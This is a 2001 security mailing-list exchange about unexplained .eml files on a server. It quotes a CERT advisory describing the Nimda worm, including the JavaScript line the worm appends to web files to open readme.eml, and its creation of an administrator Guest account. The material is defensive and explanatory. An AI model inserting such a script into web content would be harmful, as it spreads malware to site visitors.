The odd thing is its not putting that javascript into any of my code. That probably will only work on a windows machine and not thru unix/linux but it is dropping all the .eml files. I am replacing that machine with a diff machine so its not connected to the external network and see what happens this way I can try to find out the cause of this . ----- Original Message ----- From: David Correa <tech@linux-tech.com> To: <security-discuss@linuxsecurity.com> Cc: Matt Jezorek <matt@bluelinux.org> Sent: Sunday, November 11, 2001 1:29 PM Subject: Re: Question about .eml files I am finding > > from http://www.cert.org/advisories/CA-2001-26.html > > Once running on the server machine, the worm traverses > each directory in the system (including all those > accessible through file shares) and writes a MIME-encoded > copy of itself to disk using file names with .eml or .nws > extensions (e.g., readme.eml). When a directory containing > web content (e.g., HTML or ASP files) is found, > the following snippet of Javascript code is > appended to every one of these web-related files: > > <script language="JavaScript"> > window.open("readme.eml",null, "resizable=no, top=6000, left6000") > </script> > > This modification of web content allows further propagation > of the worm to new clients through a web browser or > through the browsing of a network file system. > > In order to further expose the machine, the worm > enables the sharing of the c: drive as C$ > creates a "Guest" account on Windows NT and > 2000 systems adds this account to the "Administrator" > group. > > Furthermore, the Nimda worm infects existing > binaries on the system by creating Trojan horse copies of legitimate > applications. These Trojan horse versions of the > applications will first execute the Nimda code (further infecting the > system and potentially propagating the worm), and > then complete their intended function. > > David Correa RHCE CCNA _ _ _ _ _ _ _ _ ___ ____ ____ _ _ > tech@linux-tech.com | | |\ | | | \/ | |___ | |__| > http://www.linux-tech.com |___ | | \| |__| _/\_ | |___ |___ | | ------------------------------------------------------------------------ To unsubscribe email security-discuss-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
